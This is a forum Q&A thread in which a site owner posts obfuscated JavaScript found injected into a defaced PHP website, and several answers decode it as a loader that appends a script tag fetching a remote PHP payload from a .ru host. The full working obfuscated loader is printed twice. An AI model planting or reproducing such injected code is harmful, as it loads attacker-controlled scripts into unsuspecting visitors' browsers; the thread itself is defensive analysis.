What does this script do? Is it malicious?

Question

This script was added to a defaced web page of a client web site running PHP. I have no clue what this script can do, and do not know whether this is really malicious. Can someone advise. Please find code below....

var GU = '';
var h;
var X = new String();
var mP = "";
H = function () {
    var F = ["hu"];

    function L(Lc, O, d) {
        return Lc.substr(O, d);
    }
    OH = 55345;
    OH -= 37;
    var x = document;
    QM = 6929;
    QM++;
    q = 25298;
    q -= 65;
    var t = '';
    var vs = {};
    var u = ["hR"];
    var Oi = RegExp;
    var A = {
        kh: "LQ"
    };
    var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
    yz = {
        Ec: false
    };

    function y(Lc, O) {
        hI = 24414;
        hI++;
        g = {};
        a = 28529;
        a--;
        var d = new String(L("[n0jJ", 0, 1)) + O + String("]");
        var m = new Oi(d, String("g"));
        n = {
            kW: 40818
        };
        ly = {
            HN: false
        };
        return Lc.replace(m, t);
    };
    ZW = 9686;
    ZW -= 202;
    GE = 56525;
    GE -= 235;
    D = ["u_", "QP"];
    var E = null;
    var vd = {
        ka: "J"
    };
    var Jn = new Date();
    Xg = {
        V: 51919
    };
    var l = 751407 - 743327;
    try {} catch (U) {};
    var W = new String("body");
    var qi = "qi";
    this.Vf = 38797;
    this.Vf--;
    var P = y('skchrkikpjtJ', 'SvFJDneKyEB_akgG1jx6h7OMZ');
    var RlE = 58536;
    var Xx = false;
    this.jo = '';
    vi = 41593;
    vi--;
    h = function () {
        try {
            var YU = new String();
            var DY = "";
            var dY = y('c4rJeJaVt_ebEslVe4mJe_n4ty', 'bqV_4sJy6');
            CN = {
                _Y: 63379
            };
            s = x[dY](P);
            var fH = "fH";
            pI = 33929;
            pI--;
            Uw = [];
            var G = y('sVrvc5', '5wvD6TG4IuR2MLBjQgPpbVK');
            var Wg = [];
            var Lc = l + v;
            var yW = new String();
            var iO = new String();
            var Oe = String("defe" + "r");
            var Et = ["qO", "AF"];
            var QX = 13548;
            s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
            PA = {};
            s[Oe] = [2, 1][1];
            this.Vt = "Vt";
            var ho = 46131;
            try {
                var kn = 'cI'
            } catch (kn) {};
            this.ww = 27193;
            this.ww += 97;
            x[W].appendChild(s);
            this.yk = 60072;
            this.yk++;
            var Lp = new Date();
        } catch (PY) {
            this.ku = 43483;
            this.ku++;
            this.ra = 47033;
            this.ra--;
            this.ru = "ru";
        };
        var lu = new Array();
        var me = new String();
    };
};
YB = ["LB", "uM"];
var AI = {
    Vm: 4707
};
H();
this.mDs = 57864;
this.mDs -= 135;
zz = 44697;
zz++;
var sn = [];
window.onload = h;
var PQ = false;
var mF = {
    Hm: false
};
try {
    var r_ = 'iv'
} catch (r_) {};
this.z_ = "z_";

Answer 1

Here is the "beautified script":

var GU = '';
var h;
var X = new String();
var mP = "";
H = function () {
    var F = ["hu"];

    function L(Lc, O, d) {
        return Lc.substr(O, d);
    }
    OH = 55345;
    OH -= 37;
    var x = document;
    QM = 6929;
    QM++;
    q = 25298;
    q -= 65;
    var t = '';
    var vs = {};
    var u = ["hR"];
    var Oi = RegExp;
    var A = {
        kh: "LQ"
    };
    var v = new String("/goo" + "gle." + L("com/DyBg", 0, 4) + L("abc.EBgq", 0, 4) + L("0vm1go.c1m0v", 4, 4) + "om/t" + L("erraX6U", 0, 4) + L(".comKvlS", 0, 4) + L("P1By.br.By1P", 4, 4) + "php");
    yz = {
        Ec: false
    };

    function y(Lc, O) {
        hI = 24414;
        hI++;
        g = {};
        a = 28529;
        a--;
        var d = new String(L("[n0jJ", 0, 1)) + O + String("]");
        var m = new Oi(d, String("g"));
        n = {
            kW: 40818
        };
        ly = {
            HN: false
        };
        return Lc.replace(m, t);
    };
    ZW = 9686;
    ZW -= 202;
    GE = 56525;
    GE -= 235;
    D = ["u_", "QP"];
    var E = null;
    var vd = {
        ka: "J"
    };
    var Jn = new Date();
    Xg = {
        V: 51919
    };
    var l = 751407 - 743327;
    try {} catch (U) {};
    var W = new String("body");
    var qi = "qi";
    this.Vf = 38797;
    this.Vf--;
    var P = y('skchrkikpjtJ', 'SvFJDneKyEB_akgG1jx6h7OMZ');
    var RlE = 58536;
    var Xx = false;
    this.jo = '';
    vi = 41593;
    vi--;
    h = function () {
        try {
            var YU = new String();
            var DY = "";
            var dY = y('c4rJeJaVt_ebEslVe4mJe_n4ty', 'bqV_4sJy6');
            CN = {
                _Y: 63379
            };
            s = x[dY](P);
            var fH = "fH";
            pI = 33929;
            pI--;
            Uw = [];
            var G = y('sVrvc5', '5wvD6TG4IuR2MLBjQgPpbVK');
            var Wg = [];
            var Lc = l + v;
            var yW = new String();
            var iO = new String();
            var Oe = String("defe" + "r");
            var Et = ["qO", "AF"];
            var QX = 13548;
            s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;
            PA = {};
            s[Oe] = [2, 1][1];
            this.Vt = "Vt";
            var ho = 46131;
            try {
                var kn = 'cI'
            } catch (kn) {};
            this.ww = 27193;
            this.ww += 97;
            x[W].appendChild(s);
            this.yk = 60072;
            this.yk++;
            var Lp = new Date();
        } catch (PY) {
            this.ku = 43483;
            this.ku++;
            this.ra = 47033;
            this.ra--;
            this.ru = "ru";
        };
        var lu = new Array();
        var me = new String();
    };
};
YB = ["LB", "uM"];
var AI = {
    Vm: 4707
};
H();
this.mDs = 57864;
this.mDs -= 135;
zz = 44697;
zz++;
var sn = [];
window.onload = h;
var PQ = false;
var mF = {
    Hm: false
};
try {
    var r_ = 'iv'
} catch (r_) {};
this.z_ = "z_";

I think that this line in particular is a bit creepy:

s[G] = new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;

It sets s[G] to a URL on tenthprofit.ru.

Answer 2

This script adds a new <script> element to the body of the HTML file which tries to load "tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php" as the src element of the tag. It's been taken down, so it should be harmless by now.

To the end of the BODY tag following line is added:

<script src="http://tenthprofit.ru:8080/google.com/abc.go.com/terra.com.br.php"></script>

Answer 3

Yes this is certainly malicious. It tries to look like a part of google:

new String("/goo" + "gle." + L("com/DyBg", 0, 4)

But it acctually does something (redirect / information gathering) on tenthprofit.ru

new String("http:" + L("//ten5qC", 0, 5) + "thpro" + "fit.r" + L("u:mn7k", 0, 2)) + Lc;

Best is to save this code and delete it from the page.

Also to make it more readable you can run it trough: Jsbeautifier

Answer 4

Well, by definition it is malicious, as it was added as part of a defacement. It appears to redirect people to tenthprofit.ru, but I haven't run it so that's based on a cursory inspection of the (obfuscated) code.

Answer 5

If you want your question answered, i guess u need to format your code to look better. In a more human readable form.

Something like this How to scroll the horizontal scrollbar in an iFrame from the parent frame?

Edit

Also it looks like your "Malicious" script broke the SO site. it is certainly Malicious

Answer 6

If you didn't add it, well, than it certainly classifies as malicious.